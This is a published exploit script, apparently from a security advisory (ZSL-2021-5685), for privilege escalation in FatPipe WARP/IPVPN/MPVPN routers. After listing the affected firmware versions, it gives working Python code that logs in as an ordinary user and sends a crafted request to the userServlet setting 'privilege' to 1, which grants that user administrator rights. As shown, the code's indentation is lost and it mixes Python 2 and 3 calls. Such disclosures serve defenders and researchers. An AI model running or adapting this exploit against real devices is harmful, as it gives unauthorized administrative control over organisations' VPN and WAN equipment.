FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Privilege Escalation

`#!/usr/bin/env python3  
#  
#  
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation  
#  
#  
# Vendor: FatPipe Networks Inc.  
# Product web page: https://www.fatpipeinc.com  
# Affected version: WARP / IPVPN / MPVPN  
# 10.2.2r38  
# 10.2.2r25  
# 10.2.2r10  
# 10.1.2r60p82  
# 10.1.2r60p71  
# 10.1.2r60p65  
# 10.1.2r60p58s1  
# 10.1.2r60p58  
# 10.1.2r60p55  
# 10.1.2r60p45  
# 10.1.2r60p35  
# 10.1.2r60p32  
# 10.1.2r60p13  
# 10.1.2r60p10  
# 9.1.2r185  
# 9.1.2r180p2  
# 9.1.2r165  
# 9.1.2r164p5  
# 9.1.2r164p4  
# 9.1.2r164  
# 9.1.2r161p26  
# 9.1.2r161p20  
# 9.1.2r161p17  
# 9.1.2r161p16  
# 9.1.2r161p12  
# 9.1.2r161p3  
# 9.1.2r161p2  
# 9.1.2r156  
# 9.1.2r150  
# 9.1.2r144  
# 9.1.2r129  
# 7.1.2r39  
# 6.1.2r70p75-m  
# 6.1.2r70p45-m  
# 6.1.2r70p26  
# 5.2.0r34  
#  
# Summary: FatPipe Networks invented the concept of router-clustering,  
# which provides the highest level of reliability, redundancy, and speed  
# of Internet traffic for Business Continuity and communications. FatPipe  
# WARP achieves fault tolerance for companies by creating an easy method  
# of combining two or more Internet connections of any kind over multiple  
# ISPs. FatPipe utilizes all paths when the lines are up and running,  
# dynamically balancing traffic over the multiple lines, and intelligently  
# failing over inbound and outbound IP traffic when ISP services and/or  
# components fail.  
#  
# FatPipe IPVPN balances load and provides reliability among multiple  
# managed and CPE based VPNs as well as dedicated private networks. FatPipe  
# IPVPN can also provide you an easy low-cost migration path from private  
# line, Frame or Point-to-Point networks. You can aggregate multiple private,  
# MPLS and public networks without additional equipment at the provider's  
# site.  
#  
# FatPipe MPVPN, a patented router clustering device, is an essential part  
# of Disaster Recovery and Business Continuity Planning for Virtual Private  
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and  
# 300% times more reliable, redundant and faster. MPVPN can take WANs with  
# an uptime of 99.5% or less and make them 99.999988% or higher, providing  
# a virtually infallible WAN. MPVPN dynamically balances load over multiple  
# lines and ISPs without the need for BGP programming. MPVPN aggregates up  
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed  
# you need to keep your VPN up and running despite failures of service, line,  
# software, or hardware.  
#  
# Desc: The application suffers from a privilege escalation vulnerability.  
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP  
# POST request and setting the JSON parameter 'privilege' to integer value  
# '1' gaining administrative rights (group ADMINISTRATOR, 1).  
#  
# Tested on: Apache-Coyote/1.1  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2021-5685  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php  
#  
#  
# 30.05.2016  
# 25.07.2021  
#  
#  
  
import sys  
import time#######  
import requests################  
requests.packages.urllib3.disable_warnings()  
  
if len(sys.argv) !=2:  
print  
print("********************************************************")  
print("* *")  
print("* Privilege escalation from USER to ADMINISTRATOR role *")  
print("* in *")  
print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")  
print("* *")  
print("* ZSL-2021-5685 *")  
print("* *")  
print("********************************************************")  
print("\n[POR] Usage: ./escalator.py [IP]")  
sys.exit()  
  
ajpi=sys.argv[1]  
print  
juzer=raw_input("[UNE] Username: ")  
pasvord=raw_input("[UNE] Password: ")  
  
sesija=requests.session()  
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}  
  
hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',  
'Accept' :'application/json, text/javascript, */*; q=0.01',  
'X-Requested-With':'XMLHttpRequest',  
'Sec-Ch-Ua-Mobile':'?0',  
'User-Agent' :'Fatnet/1.b',  
'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8',  
'Origin' :'https://'+ajpi,  
'Sec-Fetch-Site' :'same-origin',  
'Sec-Fetch-Mode' :'cors',  
'Sec-Fetch-Dest' :'empty',  
'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet',  
'Accept-Encoding' :'gzip, deflate',  
'Accept-Language' :'en-US,en;q=0.9',  
'Connection' :'close'}  
  
juarel1='https://'+ajpi+'/fpui/loginServlet'  
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)  
  
if not 'success' in alo.text:  
print('[GRE] Login error.')  
sys.exit()  
else:  
print('[POR] Authentication successful.')  
  
print('[POR] Climbing the ladder...')  
  
sluba='''  
|| || .--._  
||====|| __ '---._)  
|| ||"")\ Q Q )  
||====|| =_/ o /  
|| || | \_.-;-'-,._  
||====|| | ' o---o )  
|| || \ /H __H\ /  
||====|| '-' \"")\/ |  
|| || _ |_='-)_/  
||====|| / '. )  
|| || / /  
||====|| |___/\| /  
|| || |_| | |  
||====|| / ) \\ \\  
|| || (__/ \___\\  
||====|| \_\\  
|| || / )  
||====|| (__/  
'''  
  
for k in sluba:  
sys.stdout.write(k)  
sys.stdout.flush()  
time.sleep(0.01)  
  
juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'  
posta={  
'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'  
}  
stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)  
  
if not 'true' in stanje.text:  
print('\n[GRE] Something\'s fishy!')  
sys.exit()  
else:  
print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')  
sys.exit()  
`